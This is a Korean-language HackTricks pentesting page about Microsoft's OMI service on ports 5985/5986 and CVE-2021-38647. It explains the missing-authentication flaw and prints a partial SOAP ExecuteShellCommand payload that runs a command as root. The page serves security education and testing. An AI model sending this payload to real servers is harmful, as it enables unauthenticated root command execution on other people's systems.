5985,5986 - Pentesting OMI

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ธฐ๋ณธ ์ •๋ณด

OMI๋Š” Microsoft์—์„œ ์›๊ฒฉ ๊ตฌ์„ฑ ๊ด€๋ฆฌ๋ฅผ ์œ„ํ•ด ์„ค๊ณ„๋œ ์˜คํ”ˆ ์†Œ์Šค ๋„๊ตฌ๋กœ ์ œ๊ณต๋ฉ๋‹ˆ๋‹ค. ์ด๋Š” Azure์—์„œ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์„œ๋น„์Šค๋ฅผ ์‚ฌ์šฉํ•˜๋Š” Linux ์„œ๋ฒ„์™€ ํŠนํžˆ ๊ด€๋ จ์ด ์žˆ์Šต๋‹ˆ๋‹ค:

  • Azure Automation
  • Azure Automatic Update
  • Azure Operations Management Suite
  • Azure Log Analytics
  • Azure Configuration Management
  • Azure Diagnostics

์ด ์„œ๋น„์Šค๊ฐ€ ํ™œ์„ฑํ™”๋˜๋ฉด omiengine ํ”„๋กœ์„ธ์Šค๊ฐ€ ์‹œ์ž‘๋˜์–ด ๋ชจ๋“  ์ธํ„ฐํŽ˜์ด์Šค์—์„œ ๋ฃจํŠธ๋กœ ์ˆ˜์‹  ๋Œ€๊ธฐํ•ฉ๋‹ˆ๋‹ค.

๊ธฐ๋ณธ ํฌํŠธ๋กœ ์‚ฌ์šฉ๋˜๋Š” ๊ฒƒ์€ 5985 (http) ๋ฐ 5986 (https)์ž…๋‹ˆ๋‹ค.

CVE-2021-38647 ์ทจ์•ฝ์ 

9์›” 16์ผ์— ๊ด€์ฐฐ๋œ ๋ฐ”์™€ ๊ฐ™์ด, ์–ธ๊ธ‰๋œ ์„œ๋น„์Šค๊ฐ€ ๋ฐฐํฌ๋œ Azure์˜ Linux ์„œ๋ฒ„๋Š” OMI์˜ ์ทจ์•ฝํ•œ ๋ฒ„์ „์œผ๋กœ ์ธํ•ด ์ทจ์•ฝํ•ฉ๋‹ˆ๋‹ค. ์ด ์ทจ์•ฝ์ ์€ OMI ์„œ๋ฒ„๊ฐ€ /wsman ์—”๋“œํฌ์ธํŠธ๋ฅผ ํ†ตํ•ด ๋ฉ”์‹œ์ง€๋ฅผ ์ฒ˜๋ฆฌํ•  ๋•Œ ์ธ์ฆ ํ—ค๋”๋ฅผ ์š”๊ตฌํ•˜์ง€ ์•Š์•„ ํด๋ผ์ด์–ธํŠธ๋ฅผ ์ž˜๋ชป ์ธ์ฆํ•˜๋Š” ๋ฐ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ณต๊ฒฉ์ž๋Š” ์ธ์ฆ ํ—ค๋” ์—†์ด โ€œExecuteShellCommandโ€ SOAP ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ „์†กํ•˜์—ฌ ์„œ๋ฒ„๊ฐ€ ๋ฃจํŠธ ๊ถŒํ•œ์œผ๋กœ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๋„๋ก ๊ฐ•์ œํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

์ด CVE์— ๋Œ€ํ•œ ์ž์„ธํ•œ ์ •๋ณด๋Š” ์—ฌ๊ธฐ ํ™•์ธํ•˜์„ธ์š”.

์ฐธ์กฐ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ